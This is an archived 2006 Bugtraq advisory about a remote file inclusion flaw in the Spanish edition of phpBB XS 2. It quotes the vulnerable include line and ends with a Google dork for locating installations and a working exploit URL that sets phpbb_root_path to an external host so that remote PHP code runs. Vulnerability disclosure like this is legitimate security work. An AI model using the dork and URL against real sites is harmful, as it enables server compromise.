lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 28 Sep 2006 16:24:35 -0000
From: chris_hasibuan@...oo.com
To: bugtraq@...urityfocus.com
Subject: SolpotCrew Advisory #14 - phpBB XS 2 spain version
 (phpbb_root_path) Remote File Inclusion

#############################SolpotCrew Community################################
#
#  phpBB XS 2 spain version (phpbb_root_path) Remote File Inclusion 
#
#  Download  : http://www.elanzuelo.es/phpbb.tar.gz
#
#################################################################################
#
#
#       Bug Found By :Solpot a.k.a (k. Hasibuan) (28-09-2006)
#
#       contact: chris_hasibuan@...oo.com 
# 
#       Website : http://www.nyubicrew.org/adv/solpot-adv-10.txt
#
################################################################################
#
#
#      Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid ,Noordin`M`TOP
#              robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa
#              home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet-homo
#              Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX
#              x-ace , Dalmet , th3sn0wbr4in , iFX , ^YoGa^ , Soey , vend3r , k1tk4t
#              [K]ompoR_Meledu[K] , Scr3W_W0rM , TOMMY^PENGAMEN , Belaj4r, ^NakKuta            
#              and all member solpotcrew community @ http://nyubicrew.org/forum/
#              especially thx to str0ke @ milw0rm.com
#
###############################################################################
Input passed to the "phpbb_root_path" is not properly verified  
before being used to include files. This can be exploited to execute  
arbitrary PHP code by including files from local or external resources.  

code from includes/functions_kb.php

/***************************************************************************
 *
 *   This program is free software; you can redistribute it and/or modify
 *   it under the terms of the GNU General Public License as published by
 *   the Free Software Foundation; either version 2 of the License, or
 *   (at your option) any later version.
 *
 *
 ***************************************************************************/

//
// get_quick_stats();
// gets number of articles
//

include_once($phpbb_root_path.'includes/functions_color_groups.'.$phpEx);


function get_quick_stats()


Google Dork : "Traduccion Espanol por phpBB-Es"

Exploit : http://somehost/path_to_phpbbXS2/includes/functions_kb.php?phpbb_root_path=http://injek-pala-lappet?

##############################MY LOVE JUST FOR U RIE#########################  
######################################E.O.F##################################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ